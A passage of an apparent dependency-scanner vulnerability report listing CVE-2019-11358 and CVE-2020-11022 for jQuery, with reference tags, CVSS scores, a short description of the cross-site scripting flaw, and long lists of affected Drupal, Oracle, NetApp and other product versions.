ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES,VENDOR_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY info - https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/ info - https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b info - https://nvd.nist.gov/vuln/detail/CVE-2019-11358 Vulnerable Software & Versions (NVD):
cpe:2.3:a:backdropcms:backdrop:*:*:*:*:*:*:*:* versions from (including) 1.11.0; versions up to (excluding) 1.11.9 cpe:2.3:a:backdropcms:backdrop:*:*:*:*:*:*:*:* versions from (including) 1.12.0; versions up to (excluding) 1.12.6 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 7.0; versions up to (excluding) 7.66 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.5.0; versions up to (excluding) 8.5.15 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.6.0; versions up to (excluding) 8.6.15 cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* versions from (including) 3.0.0; versions up to (including) 3.9.4 cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:* versions up to (excluding) 3.4.0 cpe:2.3:a:netapp:oncommand_system_manager:*:*:*:*:*:*:*:* versions from (including) 3.0; versions up to (including) 3.1.3 cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:* cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_express:*:*:*:*:*:*:*:* versions up to (excluding) 19.1 cpe:2.3:a:oracle:application_service_level_management:13.2.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_service_level_management:13.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:12.5.0.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.1.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.2.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_enterprise_collections:*:*:*:*:*:*:*:* versions from (including) 2.7.0; versions up to (including) 2.8.0 cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:* versions from (including) 2.4.0; versions up to (including) 2.10.0 cpe:2.3:a:oracle:bi_publisher:5.5.0.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:bi_publisher:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:bi_publisher:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:big_data_discovery:1.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:business_process_management_suite:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_analytics:12.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_application_session_controller:3.8m0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5.0.23.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_diameter_signaling_router:8.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_diameter_signaling_router:8.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_diameter_signaling_router:8.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_diameter_signaling_router:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:* versions from (including) 16.1.0; versions up to (including) 16.4.0 cpe:2.3:a:oracle:communications_element_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_element_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_element_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_interactive_session_recorder:*:*:*:*:*:*:*:* versions from (including) 6.0; versions up to (including) 6.4 cpe:2.3:a:oracle:communications_operations_monitor:*:*:*:*:*:*:*:* versions from (including) 4.1; versions up to (including) 4.3 cpe:2.3:a:oracle:communications_operations_monitor:3.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_operations_monitor:4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_operations_monitor:4.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_unified_inventory_management:7.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_webrtc_session_controller:7.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:diagnostic_assistant:2.12.36:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_session_border_controller:8.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 7.3.3; versions up to (including) 7.3.5 cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 8.0.2; versions up to (including) 8.1.0 cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_asset_liability_management:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_asset_liability_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_balance_sheet_planning:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_data_foundation:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_data_governance_for_us_regulatory_reporting:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.9 cpe:2.3:a:oracle:financial_services_data_integration_hub:*:*:*:*:*:*:*:* versions from (including) 8.0.5; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_data_integration_hub:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_enterprise_financial_performance_analytics:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_enterprise_financial_performance_analytics:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.0.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.4.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.5.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:* versions from (including) 8.0.2; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.5:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_profitability_management:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_profitability_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_de_nederlandsche_bank:8.0.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_us_federal_reserve:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_retail_customer_analytics:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.6 cpe:2.3:a:oracle:financial_services_retail_performance_analytics:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_retail_performance_analytics:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_revenue_management_and_billing:2.4.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_revenue_management_and_billing:2.4.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.3.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.3.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:*:*:*:*:*:*:*:* versions from (including) 19.1.0; versions up to (including) 19.1.2 cpe:2.3:a:oracle:hospitality_simphony:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:18.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:identity_manager:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_accounting_analyzer:8.0.9:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_data_foundation:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:insurance_ifrs_17_analyzer:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_ifrs_17_analyzer:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:*:*:*:*:*:*:*:* versions from (including) 5.0.0.0; versions up to (including) 5.6.0.0 cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.6.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_performance_insight:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper_and_adf:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper_and_adf:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper_and_adf:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:knowledge:*:*:*:*:*:*:*:* versions from (including) 8.6.0; versions up to (including) 8.6.3 cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation:*:*:*:*:*:*:*:* versions from (including) 12.2.0; versions up to (including) 12.2.15 cpe:2.3:a:oracle:policy_automation:10.4.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation:12.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation:12.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation_for_mobile_devices:*:*:*:*:*:*:*:* versions from (including) 12.2.0; versions up to (including) 12.2.15 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 16.2.0; versions up to (including) 16.2.11 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 17.12.0; versions up to (including) 17.12.7 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 18.8.0; versions up to (including) 18.8.9 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 19.12.0; versions up to (including) 19.12.4 cpe:2.3:a:oracle:primavera_gateway:15.2.18:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:* versions from (including) 17.7; versions up to (including) 17.12 cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:real-time_scheduler:*:*:*:*:*:*:*:* versions from (including) 2.3.0.1; versions up to (including) 2.3.0.3 cpe:2.3:a:oracle:rest_data_services:11.2.0.4:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:12.1.0.2:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:12.2.0.1:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:18c:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:19c:*:*:*:-:*:*:* cpe:2.3:a:oracle:retail_back_office:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_central_office:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_central_office:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_insights:15.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_insights:16.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:18.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:19.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_point-of-service:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_point-of-service:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_returns_management:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:siebel_mobile_applications:*:*:*:*:*:*:*:* versions up to (including) 19.8 cpe:2.3:a:oracle:siebel_ui_framework:20.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:storagetek_tape_analytics_sw_tool:2.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:system_utilities:19.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:tape_library_acsls:8.5:*:*:*:*:*:*:* cpe:2.3:a:oracle:tape_library_acsls:8.5.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:transportation_management:1.4.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:utilities_mobile_workforce_management:*:*:*:*:*:*:*:* versions from (including) 2.3.0.1; versions up to (including) 2.3.0.3 cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:* cpe:2.3:a:redhat:cloudforms:4.7:*:*:*:*:*:*:* cpe:2.3:a:redhat:virtualization_manager:4.3:*:*:*:*:*:*:* CVE-2020-11022 suppress
In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY info - https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/ security-advisories@github.com - BROKEN_LINK security-advisories@github.com - BROKEN_LINK security-advisories@github.com - BROKEN_LINK security-advisories@github.com - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - MITIGATION,THIRD_PARTY_ADVISORY security-advisories@github.com - MITIGATION,VENDOR_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - RELEASE_NOTES,VENDOR_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions (NVD):
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 7.0; versions up to (excluding) 7.70 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.7.0; versions up to (excluding) 8.7.14 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.8.0; versions up to (excluding) 8.8.6 cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:* versions from (including) 1.2; versions up to (excluding) 3.5.0 cpe:2.3:a:netapp:max_data:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:oncommand_system_manager:*:*:*:*:*:*:*:* versions from (including) 3.0; versions up to (including) 3.1.3 cpe:2.3:a:netapp:snap_creator_framework:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_supplier_collaboration_for_process:6.2.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:* 